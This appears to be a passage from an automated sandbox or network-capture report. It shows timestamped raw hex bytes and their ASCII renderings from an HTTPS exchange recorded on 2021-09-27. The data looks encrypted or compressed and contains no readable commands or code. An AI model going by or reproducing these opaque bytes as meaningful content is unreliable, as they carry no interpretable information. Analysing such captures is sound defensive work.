                                        Data Ascii: .n(>?>&_pn@v&$8`Na,aClq>V\%X,o7m9=AgQ-56c]!DSd[gx&($kP}'u"=[I&4o+"oz>%M~sO\!r/Yx&d,0;2?&*UatO90w
                                        2021-09-27 17:14:38 UTC162INData Raw: ac d6 b9 f1 67 72 aa 39 e1 82 dd 23 21 f0 3a 6e 69 c5 ac b4 0f 16 f0 67 43 a8 fb 81 b6 0b 82 88 2d 54 62 42 fe f3 a7 69 ff 50 53 0f a7 8a 5b 95 1a 24 93 fc 34 b7 4f 33 ce 87 10 05 6b 22 c3 da 7a b1 62 57 82 09 8d ea 58 15 b4 ba 98 d7 6f f0 c2 b2 e4 4b 13 b3 bd fb 62 48 a2 1c 80 07 c5 63 e9 5f d1 a6 c5 5f 55 af 79 52 a1 cd 13 58 10 f3 26 4d ef 27 79 52 58 f0 c1 bb 4b ee df 50 83 ab 55 55 43 02 20 6a f1 71 30 e8 ef 81 7a a7 8f 52 72 de c0 3d bf 4c b5 9b e6 0b ab 15 ad 4f c2 dd 82 4f b1 ea 45 5b 1c dc 1a 17 6d 12 4d 1e 63 e6 b3 74 b4 16 62 32 2e f1 31 68 41 53 83 95 0a b9 84 40 6c da 42 7d 66 82 da ca 5f 2b 07 ee f7 cd de 6e 88 c6 9f 83 9e d9 cd e4 ad cf ee c1 3d 54 0e dc 11 01 38 8f 0e 02 07 39 f4 c4 38 01 4b 00 dd 60 77 39 71 ce ed 70 cc d5 51 5a e3 b9 e3
                                        Data Ascii: gr9#!:nigC-TbBiPS[$4O3k"zbWXoKbHc__UyRX&M'yRXKPUUC jq0zRr=LOOE[mMctb2.1hAS@lB}f_+n=T898K`w9qpQZ
                                        2021-09-27 17:14:38 UTC163INData Raw: ea 15 44 43 c9 eb 51 49 f1 94 36 9e 6a 31 44 23 5f 1f 1d 86 23 ec 0e 63 8c 97 d4 01 23 37 37 8a 3d 59 6e a7 c7 c9 e9 f6 a4 74 70 84 c5 5a ab 3f bb 5c 23 8b 41 6f 72 ae 1a a6 3c f1 40 9b 7c 12 09 2f 95 5a f1 7a 33 7a 12 9c 56 29 ae b1 89 4d e0 46 02 72 94 37 cc 46 44 f2 34 1d 57 af c1 7f 0e aa 1d 8f 6c 1e 37 f8 28 c3 94 7e 03 92 89 69 db 7a 21 39 e3 5a ac 2d 9c f9 4e 6a 9f 2b 27 37 3f f4 18 4f df 90 82 d7 ac f4 20 e9 16 c6 eb 5f a0 ab f7 75 74 22 68 ad ed 02 f4 a6 cd 30 66 41 a0 c3 86 06 34 06 fe 85 86 e4 f6 b0 1e 91 eb f5 d6 f3 8c bb 67 f8 c6 01 c9 b6 b5 2e 50 b3 46 10 a9 e7 76 e0 f0 b8 f6 1e a0 57 9d f8 18 3c b0 4e 2a 7d 85 fa 62 45 2c c6 91 b7 05 02 98 47 92 69 b8 de c4 fb 95 97 cb a8 e0 0a 5e e6 47 f6 2b 3b 98 a9 8c e0 21 fa c3 98 d2 94 c4 3c da 9e 21
                                        Data Ascii: DCQI6j1D#_#c#77=YntpZ?\#Aor<@|/Zz3zV)MFr7FD4Wl7(~iz!9Z-Nj+'7?O _ut"h0fA4g.PFvW<N*}bE,Gi^G+;!<!
                                        2021-09-27 17:14:38 UTC164INData Raw: 1b 9b 98 72 b0 6d e4 de 72 1c 3f e3 2d cc d6 aa e0 e2 06 3c b8 0d b5 be b5 a1 5f de cc c0 4c 0b 16 e9 71 d8 1c cf a4 4b 9d e2 1b f2 ff 2b f6 31 de 67 a2 8e da ed e5 f7 f8 62 c4 ba 8b 2d ef 3d 63 06 fe 67 54 31 44 5f b2 e9 16 9d 63 a6 bd 7c 23 7c 47 e9 eb ae 18 c2 3e 3b e9 7b 75 a8 3d dd 12 d4 99 c7 ad 08 f8 a8 f2 d9 7c 61 6b cd 18 63 92 c5 bf 53 f3 20 0b e1 cc 92 23 70 4c 72 70 4b 65 f5 ed 2b 0c 06 c9 b3 96 0c 6f 05 9d 9f 6e a9 08 f1 ca 45 cc 2f 17 d8 a7 3b 49 74 e1 32 b6 7f 4f d4 eb a0 c4 70 20 bf 21 ea 1a 00 43 54 b1 0a 23 de 2b aa c4 77 5e d1 94 68 7b e8 bc b4 28 2f d4 0f ac a3 78 e7 1c 8b 39 31 60 0c 6d 20 11 94 4f ef 4e 22 23 80 e5 89 d4 84 3e 76 51 b0 2f 0b 23 a0 23 4e d2 8b 8c 69 98 b4 6a 30 6b fc ec c9 ac 42 44 91 39 be f5 3b 84 6f f6 1f 6f 5b c8
                                        Data Ascii: rmr?-<_LqK+1gb-=cgT1D_c|#|G>;{u=|akcS #pLrpKe+onE/;It2Op !CT#+w^h{(/x91`m ON"#>vQ/##Nij0kBD9;oo[
                                        2021-09-27 17:14:38 UTC166INData Raw: 4b 63 0b ca 97 7b d4 7e 45 b6 e1 f1 e9 3b 27 2f 3f c1 24 3a a2 61 0b fc 7c c2 b6 07 29 c8 e1 b2 03 78 8c 16 5a ed 93 51 49 d4 85 15 ed 15 5b d7 3a 5c f5 71 9a e6 5b d8 2b 2d ad eb 7b 94 15 56 02 d6 97 16 64 a4 62 c0 73 e4 19 18 b1 2f be 19 c7 5e aa 3a f5 84 68 be 49 40 b0 cf f1 a7 a5 1d 6e c3 55 e5 b5 09 82 38 a0 79 7d ee 71 a7 e9 5e 82 48 a7 0e 97 62 dd c1 3d a3 42 a4 99 e7 5f 3c 14 3d cb c2 dd 15 0d a2 f4 44 27 00 db 0c 0f 6c 12 da ea 72 f9 b5 e5 16 10 71 09 78 71 a6 70 74 4c d5 14 16 be b1 5d 3a 5a 86 77 52 9d 8c 44 0d 2c 32 b1 a1 4d 28 16 bd d9 c9 0a 4d de f8 f2 fb 4f 86 ed 08 4b 08 f0 b3 07 2b 8c 58 82 90 39 ba db 6e 89 57 07 93 32 21 b9 b5 c6 a3 6f 9a 5f 03 5d ad a6 b5 d0 6c fc c7 87 e6 c1 45 82 1a bc e3 63 ce 48 62 ac f6 97 e8 6c bf 05 cf 19 ed b2
                                        Data Ascii: Kc{~E;'/?$:a|)xZQI[:\q[+-{Vdbs/^:hI@nU8y}q^Hb=B_<=D'lrqxqptL]:ZwRD,2M(MOK+X9nW2!o_]lEcHbl
                                        2021-09-27 17:14:38 UTC167INData Raw: 0a 1a a9 3d 16 26 4c 57 13 e8 dd 13 ef 96 9f 70 c4 61 45 3b 07 b2 1c 87 8c 73 5b 54 d3 1b a7 0e 4f 5c 5e a2 15 3b 32 8f 9f b9 7b 01 3b 06 b2 e7 2e d0 98 ac 63 6f 41 3b c7 99 f2 ca 47 7d 0e 32 d8 bb a8 f3 f1 16 d5 8e 84 5f e1 05 4d 99 c9 83 f8 18 82 1e 6b c8 5d 02 39 74 5d bf 91 bd b9 ea 61 8c 47 2e 59 05 d1 0b de f7 0e 0c f4 9e 4a 09 77 cb e5 f8 f2 ac 35 f2 50 46 51 40 33 a6 0f e7 27 d7 ac a5 4a 92 70 9a 9a c5 0d ed 0a 91 78 a3 b1 2c 30 c4 30 1f f2 9f 40 7b 3d b4 05 da 6e bc 51 c3 b4 55 ea 8d b3 47 ec e3 91 f5 5e 04 50 8e bf 3c 7c 9f 4f 39 40 ab 3f bc 42 3f 03 9a da 8f 05 88 61 b0 c1 1c d9 f6 37 b1 c3 41 af f3 cf 44 23 ca f1 3b 64 ba 6c 8a e1 31 c2 d8 d8 25 93 d4 bd d1 de 40 0e d2 50 89 f3 27 5a ac 91 40 08 86 b6 7f d5 52 1d 61 6b de ed bb ca f7 0a fd a5
                                        Data Ascii: =&LWpaE;s[TO\^;2{;.coA;G}2_Mk]9t]aG.YJw5PFQ@3'Jpx,00@{=nQUG^P<|O9@?B?a7AD#;dl1%@P'Z@Rak
                                        2021-09-27 17:14:38 UTC168INData Raw: 06 cd c2 4c 0b 07 0e 40 cf 75 db b5 41 50 3a 1a f0 fe 2b e7 a6 48 66 24 86 c9 fb 9c 40 f9 60 c4 ba 9a 31 7f 3c 3a 18 ef 7e 41 81 45 5d b2 e9 00 01 f0 a7 50 68 32 5a 2a 46 ea ab 18 c2 28 2a 5f 7a 23 bf 2f f4 73 47 98 c2 ad 18 ee 6e 61 d8 d4 76 7f e4 71 fb 93 c7 bf 53 e5 68 bd e0 25 85 36 46 75 eb 71 49 65 f5 fb db 5a 01 d9 a5 81 34 76 84 9c 9d 6f a9 1e 66 d7 42 13 26 02 e0 fa b4 48 76 e1 32 a0 0d aa d5 a4 b6 d3 4f dd 3f 20 e8 1a 00 55 4e 23 0b 7d c8 3c e9 b1 0c 5c d3 94 68 6d 7a 85 b3 e0 39 c3 44 ad d5 7a e5 1c 9b 2f 7a a1 0d 99 36 06 d8 d2 9c 4c 20 23 80 f3 44 09 85 21 67 46 fd 2e 11 21 a2 a2 4e c4 de 1e 68 be b9 7f 7d 6a e2 ee cb 2d 42 55 62 9e bf c4 36 91 32 eb 82 6d 51 c9 21 5a 5d 78 85 d0 d8 51 25 e5 b2 5f 3c 0d 92 1c e6 dd 4b 79 09 c9 0b 13 2f 3b 16
                                        Data Ascii: L@uAP:+Hf$@`1<:~AE]Ph2Z*F(*_z#/sGnavqSh%6FuqIeZ4vofB&Hv2O? UN#}<\hmz9Dz/z6L #D!gF.!Nh}j-BUb62mQ!Z]xQ%_<Ky/;
                                        2021-09-27 17:14:38 UTC169INData Raw: 4f 34 ce a1 13 69 60 4c 4f ff 7a 92 1c 57 82 06 09 ac 5b 27 8a 75 97 d1 3c 84 b0 db 8a 2f 60 f5 be 8a 69 68 14 39 80 58 5f 63 e9 7c 96 e2 94 5b 70 29 79 1b 18 79 31 b4 3c f3 26 68 b5 71 33 23 58 d5 c1 d7 d1 ee df 52 83 b8 5f 95 fd 47 10 46 ff 5d ab e8 15 80 49 b6 99 8a 75 59 c0 18 bf 91 2a 9b e6 5f ab 04 ad 12 c2 3b 8d 29 b4 c2 da 27 1c dc 1a 00 6d 40 4a 6d 61 c3 b3 b3 15 16 62 0b 2e e0 31 e6 40 0e 93 b1 0a 35 26 42 6c da 42 67 67 15 db 4f 4f 0e 07 fa 54 cd de 17 88 d7 9f 96 99 52 dd c8 ad 7b cc ef 3d 54 0e f0 09 3b 1d 9d 0e 27 07 84 50 c4 38 09 4b 13 dd ba 76 d9 61 e2 ed 94 6a df 51 5a e3 af e3 c7 9b ed 82 be b0 4d 3e 85 54 a3 b5 f5 a6 dd 2d 85 b1 31 e9 7e 58 1a 99 99 72 a6 79 e3 d9 a9 1f 1b 15 59 de d7 a8 e1 e2 10 54 78 0c e7 ae 91 5b 87 cf cd c2 4c 0b
                                        Data Ascii: O4i`LOzW['u</`ih9X_c|[p)yy1<&hq3#XR_GF]IuY*_;)'m@Jmab.1@5&BlBggOOTR{=T;'P8KvajQZM>T-1~XryYTx[L
                                        2021-09-27 17:14:38 UTC171INData Raw: 52 c0 07 2a 28 96 58 74 66 5c 14 31 89 9f eb 6f 33 ae 01 c2 78 05 ae 83 b4 62 f8 40 02 d6 9f ce d0 b0 55 26 34 9c 6e a8 c1 f3 10 c6 19 d7 6b 7b 07 67 0e b4 b3 d5 1e 92 89 79 d8 ac 06 29 e8 76 ac fb 9d b8 7d 60 9f 56 28 ce 18 63 03 f6 f1 ee bd f4 ac 48 0f 64 0f a7 d9 16 a8 1f ee 1f 53 52 46 33 f4 1b f4 d3 d0 77 7a 61 a0 ba bb 9b 33 0c fe 1b 97 1e f7 46 0f 18 c2 30 e6 f4 8c 42 7d 2e dc 90 c8 41 a6 7b 54 75 6c f4 8b b3 46 f5 f0 65 f2 be 91 7b 9d 59 11 7d 83 48 2a 51 ad e0 4c b3 3d 2b 9c 4a 34 05 98 63 b6 d2 8b 48 c2 c5 a6 e9 d6 ea cf cc 45 23 5d e3 2b 6f 8e 9c 87 cc 21 38 e8 d9 e1 92 c4 ac d0 49 13 df de 78 8f 7f 82 5a 4c 90 46 1b 11 ec df 22 45 37 f6 c2 77 eb a8 cb f4 19 82 36 2b a4 73 68 fe 0b 92 68 ff 26 67 32 97 0a 69 55 38 3f aa c0 03 b6 4f 37 ce f6 10
                                        Data Ascii: R*(Xtf\1o3xb@U&4nk{gy)v}`V(cHdSRF3wza3F0B}.A{TulFe{Y}H*QL=+J4cHE#]+o!8IxZLF"E7w6+shh&g2iU8?O7
                                        2021-09-27 17:14:38 UTC172INData Raw: ec b2 f6 4e c5 e9 8b 49 ad 3c 63 1b fe 78 5d 45 4a c5 b1 ba 16 85 22 a7 bd 61 23 5c 4e 81 cb 1a 1c 96 3e 92 8d 7a 75 b5 3d f2 1b f2 b9 7e a9 4c f8 aa b3 d8 7c 7c 6b e2 11 a9 8f 8e be 06 f3 90 6f e0 cc 8f 23 40 45 ae 6d 89 65 a0 ed df 4e 07 c9 ae 96 32 66 ac 92 b5 71 ff 08 5e 8d 44 cc 2e 15 e6 ae b3 46 58 ff 64 b6 49 28 d5 eb bd c4 5e 39 07 05 6e 1a 57 43 fa 96 0a 23 c3 2b ef dd 4f 79 c0 94 3f 7b f6 d3 b5 28 32 d4 57 ad 3c 7b 6a 02 cc 39 fa 29 0d 6d 3d 11 c9 4e 75 4d 96 27 d7 e5 9c b3 85 3e 6b 51 ee 2e 86 20 14 3c 19 d2 22 c4 68 98 b5 68 6c 6a 75 ef 57 a9 15 44 6a 47 bf f5 3a 86 23 f7 96 6c 95 d7 76 4c e9 fa 86 36 da 4b 23 75 0b 7a 2f 0d c5 0a 8e 40 4d a2 0b d3 1a 23 3c 3a c5 24 1c 6e e5 a0 dc c0 e8 a4 8e 76 53 f7 ae a9 4d b4 14 42 8c 41 59 52 d5 1f 9a 19
                                        Data Ascii: NI<cx]EJ"a#\N>zu=~L||ko#@EmeN2fq^D.FXdI(^9nWC#+Oy?{(2W<{j9)m=NuM'>kQ. <"hhljuWDjG:#lvL6K#uz/@M#<:$nvSMBAYR
                                        2021-09-27 17:14:38 UTC173INData Raw: da a1 08 11 b3 b9 75 63 14 1b 1c 96 17 52 62 d8 58 e7 f3 3c 95 54 af 79 3e 0e cd 84 b5 7f d7 54 6e c5 c4 17 30 58 f0 d7 bb dc ef 81 76 f7 ab 47 92 fd a1 1f 63 e9 71 a7 e9 64 a4 3d a7 e9 06 73 df c0 3d b9 45 23 9a 61 7b de 15 19 46 c2 dd 82 0c b2 ea d2 26 86 f8 6c 11 9d 82 4c eb 61 e6 b2 e3 a8 11 f8 2f 59 f1 f5 e0 40 53 83 94 0c b9 98 45 ab fe 3a 76 cb 10 db c4 5f 2b 01 ae eb ca cd 17 f1 c6 47 1e 9f d9 cd ed ab cf 2a ee 37 71 77 f6 fd 97 39 8e 0e 02 01 38 63 c5 12 2c 32 00 05 ba 76 39 71 c7 eb 70 5b de 63 7f 9a b9 f3 c8 9b fd 89 98 b1 41 8a 82 66 86 cc e3 a2 d3 2d b3 a0 17 ef 66 66 1b f3 bc 0b b0 29 66 df 72 1d 3d 03 2d e0 d6 31 c4 98 06 d8 26 0c b5 bf b7 5a 5f f2 cc 70 69 71 16 6e f5 d9 1c d2 a4 40 9c ce 1b 22 db 51 f6 4e 42 66 a2 8f d8 fa e4 37 fe b2 e1
                                        Data Ascii: ucRbX<Ty>Tn0XvGcqd=s=E#a{F&lLa/Y@SE:v_+G*7qw98c,2v9qp[cAf-ff)fr=-1&Z_piqn@"QNBf7
                                        2021-09-27 17:14:38 UTC175INData Raw: 6b 7f c5 b3 04 d7 40 44 0c 22 d8 51 ae cb df 6d d5 99 72 6d cd 03 4d 08 d0 ac f1 3d b1 f4 6a 40 a8 05 39 e3 5c aa 8b 81 9c 2c 4c e2 45 b8 a1 18 d6 18 dc 97 0d ed e5 bf 48 72 77 d3 1d ea f0 aa 35 e8 4f 4e 76 86 33 89 08 40 07 d1 ac 61 4b a6 6a a6 bf 20 0c 83 08 97 82 f0 b6 1e 32 c1 38 85 f8 c5 43 00 3d e8 fd c8 6c ba 51 57 bd 10 f8 4b b3 3b e6 b0 69 f2 5e 93 51 9e b5 f5 75 ca 49 57 42 d9 c5 79 43 2c 01 9f c2 c4 0d 58 63 cb c1 0b 22 c5 35 b7 c3 d5 a6 01 ce 0c 22 20 f0 9f 9c ba 6c 96 e6 22 c8 30 db 21 92 b9 bf 10 24 13 09 c2 52 8c fb 05 78 05 91 3b 08 e5 4d df d2 54 1d f5 62 82 c9 68 cb 89 0a 7f 73 2c 54 62 42 f8 e7 9d 4c 87 21 1a 21 8b 5f 69 a5 29 15 bc fc a3 b6 38 1b b3 e7 c4 fe 6a 8e 40 da eb 92 1f 57 06 29 74 ea 77 b9 80 ba 98 f4 aa 84 27 da 6c 2e 1d b3
                                        Data Ascii: k@D"QmrmM=j@9\,LEHrw5ONv3@aKj 28C=lQWK;i^QuIWByC,Xc"5" l"0!$Rx;MTbhs,TbBL!!_i)8j@W)tw'l.
                                        2021-09-27 17:14:38 UTC176INData Raw: 5a 5c 33 e8 ab 18 c2 a8 2a e3 7f 93 b7 40 f4 25 37 9a c2 ad 18 6e 6e 74 c3 9a 7e 16 e4 4b 8a 91 c7 bf 53 65 68 7f e5 2a 8d 5e 46 20 99 73 49 65 f5 7b db 49 1d 2f ac eb 34 e7 f7 9e 9d 6f a9 9e 66 42 41 2a 2c 68 e0 03 c7 4a 76 e1 32 20 0d 61 f4 0d bf b9 4f e0 43 22 e8 1a 00 d5 4e 07 0e c5 c1 56 e9 19 71 5e d3 94 68 ed 7a b5 95 ce 30 a9 44 5a af 78 e5 1c 9b af 7a b8 08 8b 3f 6c d8 5c e7 4e 20 23 80 73 44 a0 a5 d8 69 2c fd 03 14 23 a2 22 4e 44 fe 8e 6c 7e b7 15 7d 22 e7 ec cb ad 42 d2 42 c0 9f 13 38 fb 32 93 04 6f 51 c9 21 da 5d e0 83 d0 d8 36 25 ed 34 5d 3c 0d 92 9c e6 a7 69 44 09 ae 0b bf ae 39 16 3a 4b f8 11 8c d8 26 ea d9 9d ce c1 f4 44 ab 1a 22 1c 02 a1 a7 5b 2f d3 d3 a5 3e 4d 5a 5e f0 14 85 35 6f 9d 96 7c c3 3c 02 b2 70 2f 38 87 40 53 1e 42 7f c5 94 f4
                                        Data Ascii: Z\3*@%7nnt~KSeh*^F sIe{I/4ofBA*,hJv2 aOC"NVq^hz0DZxz?l\N #sDi,#"NDl~}"BB82oQ!]6%4]<iD9:K&D"[/>MZ^5o|<p/8@SB
                                        2021-09-27 17:14:38 UTC177INData Raw: 1c b6 3c f3 26 f8 ad ef 02 d6 5a 8d c1 80 44 ec df 52 83 3d 5f 0f ff 47 1d 1e ff 2d 3f ea 15 80 49 31 99 9e 64 39 c2 40 bf 38 bb 99 e6 5f ab 83 ad b0 c0 3b 80 71 b4 74 4a 25 1c dc 1a 87 6d 19 5a 0d 63 9b b3 23 bb 14 62 0b 2e 67 31 e1 42 b5 81 e9 0a 58 8b 40 6c da 42 e0 67 ca cd 22 5d 56 07 ad e7 cf de 17 88 50 9f 30 9d 3f cf 90 ad ea fe ed 3d 54 0e 60 11 73 2f 68 0c 7f 07 7e e4 c6 38 09 4b 96 dd 29 73 df 73 ba ed 17 dc dd 51 5a e3 2f e3 e9 82 1b 8b e5 b0 c9 86 87 54 a3 b5 75 a6 64 28 55 a2 6a e9 cc e1 18 99 99 72 26 79 7a c4 94 1f 40 15 e6 67 d5 a8 e1 e2 90 54 e4 09 53 bd ca 5b b3 75 cf c2 4c 0b 80 0e 2a c3 fa d0 d9 41 91 48 18 f0 fe 2b 60 a6 53 63 44 8d a5 fb ca 3a fb 60 c4 ba 1d 31 fa 1d 85 19 83 7e 1a fc 47 5d b2 e9 80 01 d1 a2 5b 63 5e 5a 36 26 e8 ab
                                        Data Ascii: <&ZDR=_G-?I1d9@8_;qtJ%mZc#b.g1BX@lBg"]VP0?=T`s/h~8K)ssQZ/Tud(Ujr&yz@gTS[uL*AH+`ScD:`1~G][c^Z6&
                                        2021-09-27 17:14:38 UTC178INData Raw: 43 64 07 74 ea 4a 53 83 ba 98 f4 aa 84 48 d9 6c 2e 1d b3 89 ed 60 14 1b 1c 16 17 36 76 0f 7e eb f3 da 0d 57 af 79 3e 8e cd 31 b7 da f1 5b 6e d5 5d 14 30 58 f0 57 bb bd f8 39 50 fe ab c5 14 fe a1 1f 63 69 71 4b eb f3 82 34 a7 22 80 70 df c0 3d 29 45 87 8c 00 5d d6 15 70 c0 c1 dd 82 0c 22 ea e0 24 fa de 67 11 92 04 4f eb 61 e6 25 e3 e9 01 84 09 53 f1 10 66 43 53 83 94 9c b9 4b 41 8a d8 3f 76 25 95 d8 c4 5f 2b 91 ae 2a da 38 15 f5 c6 fc 9d 9c d9 cd ed 3b cf f7 eb db 56 73 f6 95 16 3a 8e 0e 02 91 38 2a dd de 0b 36 00 78 3a 75 39 71 c7 7b 70 8f db b7 58 9e b9 25 47 98 fd 89 98 26 41 8f 9e b2 a1 c8 e3 41 5d 2e b3 a0 17 7f 66 9c 1e 7f 9b 0f b0 70 e7 dc 72 1d 3d 83 2d 9b c8 4e e3 9f 06 7e a4 0f b5 bf b7 cd 5f c4 c9 24 4e 76 16 45 76 da 1c d2 a4 d7 9c 4f 3b 16 fc
                                        Data Ascii: CdtJSHl.`6v~Wy>1[n]0XW9PciqK4"p=)E]p"$gOa%SfCSKA?v%_+*8;Vs:8*6x:u9q{pX%G&AA].fpr=-N~_$NvEvO;
                                        2021-09-27 17:14:38 UTC179INData Raw: 9d 96 7c 70 1b 02 b2 70 2f 38 87 8e 64 1e 42 7f c5 fa d0 d4 40 44 0c a2 d8 9c a8 27 f1 6d d5 9e a7 6e cd 03 4d 98 c8 cc d3 f8 90 f4 6a 71 7d 06 39 e3 5c 3a 93 45 b8 9b 62 e2 45 e2 7b 1b d6 18 dc 67 0e 40 f2 4a 4a 72 77 e4 c6 e9 f0 aa 35 78 57 0e 51 a0 31 89 08 f8 06 d3 ac 61 4b 36 72 95 90 d5 0e 83 08 b9 5b f3 b6 1e 32 54 30 6b f7 6a 40 00 3d 8c 24 cb 6c ba 51 c2 b5 0c e1 6d b1 3b e6 82 b0 f1 5e 93 51 0b bd eb 7e 65 4a 57 42 39 1c 7a 43 2c 01 0a ca 8a 10 7e 61 cb c1 3d fb c6 35 b7 c3 40 ae 1b cf a3 21 20 f0 f3 45 b9 6c 96 e6 b7 c0 2f cd 07 90 b9 bf 2a fd 10 09 c2 52 19 f3 95 58 aa 92 3b 08 0d 93 dc d2 54 1d 60 6a ba fc 4e c9 89 0a bc ad 2f 54 62 42 68 ff d9 6a 19 24 1a 21 f7 80 6a a5 29 15 3c fc 02 a0 a9 35 b3 e7 92 21 69 8e 40 da ec 92 b4 54 64 07 74 ea
                                        Data Ascii: |pp/8dB@D'mnMjq}9\:EbE{g@JJrw5xWQ1aK6r[2T0kj@=$lQm;^Q~eJWB9zC,~a=5@! El/*RX;T`jN/TbBhj$!j)<5!i@Tdt
                                        2021-09-27 17:14:38 UTC180INData Raw: 7e d7 c3 47 5d b2 e9 80 01 90 a3 5b 63 5e 5a e2 19 e8 ab 18 c2 a8 2a 8f 4a 93 b7 40 f4 d5 1d 9a c2 ad 18 6e 6e c4 df 9a 7e 16 e4 fe a0 91 c7 bf 53 65 68 36 d3 2a 8d 5e 46 44 b2 73 49 65 f5 7b db 54 00 2f ac eb 34 45 dc 9e 9d 6f a9 9e 66 6e 77 2a 2c 68 e0 ea ec 4a 76 e1 32 20 0d e8 d2 0d bf b9 4f 4f 68 22 e8 1a 00 d5 4e 4b 3e c5 c1 56 e9 4a 5a 5e d3 94 68 ed 7a d6 b5 ce 30 a9 44 1d 84 78 e5 1c 9b af 7a d6 0a 8b 3f 6c d8 9c cd 4e 20 23 80 73 44 5d 85 d8 69 2c fd dd 3e 23 a2 22 4e 44 fe ae 6e 7e b7 15 7d 7f d2 ec cb ad 42 d2 42 dd bf 13 38 fb 32 c0 31 6f 51 c9 21 da 5d 85 81 d0 d8 36 25 34 01 5d 3c 0d 92 9c e6 0f 4e 44 09 ae 0b 59 9b 39 16 3a 4b f8 11 30 da 26 ea d9 9d ed f4 f4 44 ab 1a 22 1c 6d 8f a7 5b 2f d3 bb 90 3e 4d 5a 5e f0 14 05 3a 6f 9d 96 7c ee 09
                                        Data Ascii: ~G][c^Z*J@nn~Seh6*^FDsIe{T/4Eofnw*,hJv2 OOh"NK>VJZ^hz0Dxz?lN #sD]i,>#"NDn~}BB821oQ!]6%4]<NDY9:K0&D"m[/>MZ^:o|
                                        2021-09-27 17:14:38 UTC182INData Raw: ff 61 e9 7c 96 65 8c 70 74 49 7b 43 18 00 29 b6 3c f3 26 f8 ad 58 13 d6 5a 8d c1 55 71 ec df 52 83 3d 5f 8a d8 47 1d 1e ff 7e 0b ea 15 80 49 31 99 d2 77 39 c2 40 bf 75 8f 99 e6 5f ab 83 ad 29 e4 3b 80 71 b4 bb 7e 25 1c dc 1a 87 6d 7c 48 0d 63 9b b3 91 8f 14 62 0b 2e 67 31 de 6c b5 81 e9 0a 2a bf 40 6c da 42 e0 67 1a df 22 5d 56 07 1a cc cf de 17 88 50 9f 7c ae 3f cf 90 ad 1a d5 ed 3d 54 0e 60 11 d1 3d 68 0c 7f 07 cf cf c6 38 09 4b 96 dd 0d 46 df 73 ba ed 69 f0 dd 51 5a e3 2f e3 aa 9f 1b 8b e5 b0 7b aa 87 54 a3 b5 75 a6 00 1d 55 a2 6a e9 3d cd 18 99 99 72 26 79 ca d8 94 1f 40 15 50 4b d5 a8 e1 e2 90 54 89 3f 53 bd ca 5b c1 59 cf c2 4c 0b 80 0e 31 de fa d0 d9 41 5c 65 18 f0 fe 2b 60 a6 e8 54 44 8d a5 fb 05 17 fb 60 c4 ba 1d 31 61 3b 85 19 83 7e 56 d0 47 5d
                                        Data Ascii: a|eptI{C)<&XZUqR=_G~I1w9@u_);q~%m|Hcb.g1l*@lBg"]VP|?=T`=h8KFsiQZ/{TuUj=r&y@PKT?S[YL1A\e+`TD`1a;~VG]
                                        2021-09-27 17:14:38 UTC183INData Raw: c1 f3 10 43 19 95 68 2b 01 30 0e c8 d1 d6 1e 92 89 fc d8 67 1d df e1 21 ac b1 fc bb 7d 60 9f d3 28 63 1d 30 1a a1 f1 4a dc f7 ac 48 0f e1 0f 28 f1 16 a8 48 ee 32 33 51 46 33 f4 9e f4 41 d5 4a 63 36 a0 f5 db 98 33 0c fe 9e 97 f6 ea 50 1c 4f c2 99 8b f7 8c 42 7d ab dc 9f cd 8a b8 2c 54 7e 01 f7 8b b3 46 70 f0 65 d3 b8 91 2c 9d 50 7d 7e 83 48 2a d4 ad fd 7c a5 2e 7c 9c c4 50 06 98 63 b6 57 8b e6 e5 d3 b5 be d6 9e a8 cf 45 23 5d 66 2b 8a bf 8a 94 9b 21 91 91 da e1 92 c4 29 d0 b0 33 ef c0 2f 8f 81 f8 59 4c 90 46 9e 11 a1 db 34 56 60 f6 fe 0b e8 a8 cb f4 9c 82 02 09 b2 60 3f fe 49 ef 6b ff 26 67 b7 97 e3 6d 43 2b 68 aa 2b 7c b5 4f 37 ce 71 10 07 43 68 42 a7 7a 6a 54 55 82 05 09 7c 58 34 84 5c 9a 89 3c 9e f9 d9 8a 2c 60 25 bd 49 4f f2 19 61 80 2b 8c 61 e9 7c 96
                                        Data Ascii: Ch+0g!}`(c0JH(H23QF3AJc63POB},T~Fpe,P}~H*|.|PcWE#]f+!)3/YLF4V``?Ik&gmC+h+|O7qChBzjTU|X4\<,`%IOa+a|
                                        2021-09-27 17:14:38 UTC184INData Raw: 3d 62 13 ba 8c 24 af 65 f8 43 a5 db 7c 7c 6b 72 19 7c 91 21 bd 2e f3 27 79 e3 cc 8f 23 d0 4d 24 65 af 67 88 ed ab 5b 04 c9 ae 96 a2 6e ef 9f 7b 6d d4 08 f7 98 47 cc 2e 15 76 a6 d9 5e 90 e3 4f b6 be 3d d6 eb bd c4 d9 21 32 23 0e 18 7d 43 9b e7 08 23 c3 2b 7f c5 6f 4b 35 96 15 7b 8c ca b6 28 32 d4 d2 ad 34 79 03 1e e6 39 6d 31 0e 6d 3d 11 4e 4e b5 5b c6 21 fd e5 7d ab 86 3e 6b 51 6b 2e d8 22 44 20 33 d2 a4 dd 6b 98 b5 68 eb 6a 27 f9 2d af 3f 44 3e 5d bc f5 3a 86 a4 f7 12 69 b7 cb 5c 4c c3 8c 84 36 da 4b b3 6d 0a 46 da 0f ef 0a 26 5a 4e a2 0b d3 9d 23 96 3f f0 38 36 6e f3 ba df c0 e8 a4 0b 76 0b ec a2 a9 67 b4 18 45 8f 41 59 52 45 07 c7 38 ab 58 23 66 31 5c 32 89 9f eb ea 33 92 1b 54 72 52 ae c0 ff 61 f8 40 02 53 9f 69 d2 a6 46 71 34 b0 18 ab c1 f3 10 43 19
                                        Data Ascii: =b$eC||kr|!.'y#M$eg[n{mG.v^O=!2#}C#+oK5{(24y9m1m=NN[!}>kQk."D 3khj'-?D>]:i\L6KmF&ZN#?86nvgEAYRE8X#f1\23TrRa@SiFq4C
